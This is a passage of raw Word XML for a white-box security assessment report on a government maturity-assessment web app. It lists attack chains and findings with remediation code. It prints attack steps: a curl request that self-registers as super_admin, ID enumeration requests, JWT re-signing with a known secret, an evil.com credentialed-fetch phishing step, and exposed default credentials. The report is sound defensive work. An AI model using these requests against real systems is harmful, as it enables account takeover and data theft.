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00"/>
              <w:bottom w:type="dxa" w:w="600"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CONFIDENTIAL — AUTHORIZED PERSONNEL ONLY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Application Security Assessment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A5C8F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Digital Maturity &amp; Cybersecurity Assessment System</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="7EB8E8"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">project_2.zip  |  Full White-Box Source Code Review</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="3A6F99"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">─────────────────────────────────────────────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AACCEE"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Assessment Date: March 8, 2026</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AACCEE"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Methodology: OWASP Top 10 | OWASP API Security Top 10 | CWE/CVE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AACCEE"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack: Node.js / Express / React / PostgreSQL / Puppeteer</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0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">SECURITY SCORE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">26 / 100</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL RISK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1B2A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">VULNERABILITIES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">17</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AACCEE"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">3 Critical | 7 High | 4 Med | 3 Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="180"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="180"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">VERDICT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="52"/>
                <w:szCs w:val="52"/>
              </w:rPr>
              <w:t xml:space="preserve">BLOCKED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT PRODUCTION READY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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">1.  EXECUTIVE SUMMARY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A comprehensive white-box security assessment was conducted against the Digital Maturity &amp; Cybersecurity Assessment System (project_2.zip). The system is a government-facing platform built on Node.js/Express, React, and PostgreSQL, used to assess digital and cybersecurity maturity of public entities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment identified 17 vulnerabilities across 15 security domains. The application is NOT safe for production deployment. Among the most severe findings: an unauthenticated attacker can register as super_admin in a single HTTP request, government admin passwords are publicly visible on the login page, and a chained exploit path exists from zero-authentication to full server compromise (OS-level code execution) without any privileged access.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1500"/>
        <w:gridCol w:w="14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Count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CVSS Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Fix SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">9.1–9.8</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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">24 hrs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-01,V-02,V-03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50A"/>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550A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">7.1–8.8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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">7 days</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7"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-04–V-11</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bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4.9–6.5</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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="14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F2937"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-12–V-15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5"/>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A6B35"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4.3–4.9</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9"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">90 days</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F2937"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">V-16,V-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">2.  CRITICAL ATTACK CHAINS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Chain 1 — Zero-Auth Full Server Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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9.8 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F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-01: POST /api/auth/register with role='super_admin' → receive super_admin JWT. No credentials required.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-05: Create assessment with malicious HTML/JS in entity name field (no escaping in PDF templates).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-06: Trigger PDF export → Puppeteer renders payload with --no-sandbox → OS command execution.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RESULT: Complete server compromise, full database dump, ransomware delivery — zero prior credentials needed.</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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Chain 2 — No-Skill Breach via Visible Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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9.1 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F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-03: Visit login page → read admin@system.gov / password123 displayed in browser.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-02: Call GET /api/assessments/1..N and GET /api/exports/pdf/N → enumerate all organizational data.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-08: Decode JWT payload to extract full permissions list and understand system architecture.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RESULT: Complete theft of all government assessment data. No hacking tools needed — just a browser.</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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Chain 3 — CORS + Phishing Session Hijack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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8.8 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F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-07: CORS bug allows any origin to make credentialed requests to the API.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-09: JWT stored in localStorage — readable via cross-origin fetch due to CORS bug.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Send phishing email → victim clicks → evil.com runs credentialed fetch to API.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">RESULT: Complete session hijack with 7-day persistence. All victim data exfiltrated silently.</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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Chain 4 — JWT Forgery to Admin Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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8.1 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F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-08: JWT secret is the known default development key (readable from committed .env / source).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Register as entity_user, obtain valid JWT. Decode payload.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Modify: role='super_admin', permissions=[all]. Re-sign with known secret.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-02 + V-11: Use forged token to access all assessments, approve/reject any submission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">3.  VULNERABILITY DETAILS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-01  |  Unauthenticated Self-Registration with Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</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Authentication &amp; Authorization</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server/routes/auth.js — Lines 12-54 | POST /api/auth/register</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registration endpoint is fully public and accepts a user-controlled 'role' field that is inserted directly into the database with no server-side validation. An unauthenticated attacker can register with role='super_admin', gaining instant full system access — no credentials or prior authentication required.</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server/routes/auth.js  Lines 12-14  — NO authentication on this route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router.post('/register',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const { email, password, full_name, role = 'entity_user', entity_id } = req.body;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 client-controlled role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 no auth check, no role validation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await query(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`INSERT INTO users (email, password_hash, full_name, role, entity_id)`,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[email, password_hash, full_name, role, entity_id]  // role inserted as-is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curl -X POST http://target/api/auth/register -H 'Content-Type: application/json' \
  -d '{"email":"hacker@x.com","password":"x","full_name":"H","role":"super_admin"}'
=&gt; 201 Created + super_admin JWT. Full compromise in one request.</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Require authentication and manage_users permission to create accounts. Always assign role server-side, never accept from client.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server/routes/auth.js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router.post('/register',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authenticateToken,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checkPermission('manage_users'),  // require admin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async (req, res) =&gt;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 email, password, full_name, entity_id } = req.body;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role = 'entity_user';  // always server-assigned, never client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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-02  |  IDOR — Assessment &amp; PDF Export Without Ownership Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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8.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)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Insecure Direct Object Reference / Broken Access Control</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server/routes/assessments.js — GET /:id (Lines 62-120) | server/routes/exports.js — GET /pdf/:assessmentId (Lines 11-58)</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GET /api/assessments/:id returns full assessment data by numeric ID with no check that the authenticated user belongs to the owning entity. The PDF export endpoint shares the same flaw. Any authenticated user can enumerate all assessments and download their complete PDF reports by incrementing the ID.</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server/routes/assessments.js  Lines 64-80 — no ownership check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router.get('/:id', authenticateToken,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const result = await query(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`SELECT a.*, e.name FROM assessments a JOIN entities e ON a.entity_id=e.id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WHERE a.id = $1`,  // only checks ID — any user can read any assessment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res.json(response);  // returned to any authenticated user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server/routes/exports.js  Lines 11-58 — same flaw in PDF export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router.get('/pdf/:assessmentId', authenticateToken,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Zero entity/ownership check — any user downloads any PDF</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res.send(pdfBuffer);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Login as entity_user (entity_id=5):
  GET /api/assessments/1   =&gt; Returns a different org's classified data
  GET /api/exports/pdf/1   =&gt; Downloads that org's full PDF report
Iterate 1..N for complete database enumeration.</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After fetching, verify the assessment's entity_id matches the requesting user's authorized entities. Apply to all accessor endpoints consistently.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add after fetch in assessments.js and exports.js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assessment = assessmentResult.rows[0];</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if (req.user.role === 'entity_user')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(assessment.entity_id !== req.user.entity_id)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return res.status(403).json({ error: 'Access denied'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else if (req.user.role === 'ministry_admin')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ok = await checkEntityInMinistryTree(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req.user.entity_id, assessment.entity_id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(!ok) return res.status(403).json({ error: 'Access denied'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1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">V-03  |  Hardcoded Production Credentials in Frontend Source Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)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Sensitive Data Exposure</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src/pages/Login.jsx — Lines 81-86</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Three admin-level credentials are hardcoded in the React Login component, rendered visibly in the browser UI, and compiled into the production JavaScript bundle. Any visitor, web crawler, or person who opens browser DevTools can read the full credentials: admin@system.gov, admin@modt.gov, user@ncc.gov — all with password 'password123'.</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src/pages/Login.jsx  Lines 81-86 — visible to every visitor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&lt;div className='space-y-1 text-xs text-gray-500'&gt;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&lt;p&gt;• مدير النظام: admin@system.gov / password123&lt;/p&gt;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&lt;p&gt;• مدير الوزارة: admin@modt.gov / password123&lt;/p&gt;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&lt;p&gt;• مستخدم جهة: user@ncc.gov / password123&lt;/p&gt;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&lt;/div&gt;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1. Open application URL in any browser — no login needed.
2. Credentials visible in plain text on the login page.
3. Alternatively: curl http://target/ | grep 'password'
